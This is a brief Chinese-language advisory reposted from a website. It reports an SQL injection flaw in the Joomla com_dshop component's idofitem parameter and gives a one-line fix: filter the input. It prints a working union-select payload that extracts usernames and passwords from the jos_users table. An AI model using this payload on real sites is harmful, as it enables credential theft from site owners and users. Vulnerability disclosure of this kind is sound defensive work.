标题: Joomla Component (com_dshop) SQL Injection Vulnerability
作者: CoBRa_21 HdhCmsTest2cto测试数据 uyku_cu [at] windows live测试数据
级别: 高风险
SQL 缺陷
http://HdhCmsTest2cto测试数据 /[PATH]/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 (SQL)
测试示例
+union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users
HdhCmsTest2cto测试数据 修复:
过滤该页面参数输入
查看更多关于Joomla 组件(com_dshop) SQL注射缺陷及修复 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12742